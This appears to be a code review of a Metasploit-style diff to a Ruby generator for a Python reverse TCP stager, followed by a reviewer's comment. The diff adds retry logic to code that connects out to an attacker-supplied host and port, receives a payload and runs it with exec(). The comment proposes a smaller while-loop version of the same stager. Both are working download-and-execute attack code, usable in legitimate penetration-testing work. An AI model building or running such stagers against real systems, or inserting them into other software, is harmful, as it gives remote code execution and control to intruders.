lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,14 +45,22 @@ def transport_config(opts={})
   def generate_reverse_tcp(opts={})
     # Set up the socket
     cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "import time\n"
+    cmd << "def connect():\n"
+    cmd << "\ttry:\n"
+    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     cmd << py_send_uuid if include_send_uuid
-    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
-    cmd << "d=s.recv(l)\n"
-    cmd << "while len(d)<l:\n"
-    cmd << "\td+=s.recv(l-len(d))\n"
-    cmd << "exec(d,{'s':s})\n"
+    cmd << "\t\tl=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "\t\td=s.recv(l)\n"
+    cmd << "\t\twhile len(d)<l:\n"
+    cmd << "\t\t\td+=s.recv(l-len(d))\n"
+    cmd << "\t\texec(d,{'s':s})\n"
+    cmd << "\texcept Exception:\n"
+    cmd << "\t\t\ttime.sleep(#{opts[:retry_wait]})\n"
+    cmd << "\t\t\tconnect()\n"
```

Comment:
It seems like a bad idea to have a scenario where you potentially endlessly recurse into the same function. Also the `connect` function doesn't seem necessary, since you could achieve the same affect with a loop like:
```python
while 1:
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        ...
        exec(d,{'s':s})
        break
    except:
        pass
```

This would also help keep the stager smaller in the following two ways:
  * Not defining the `connect` function so the name and extra spacing doesn't exist
  * Not necessary to specify `Exception`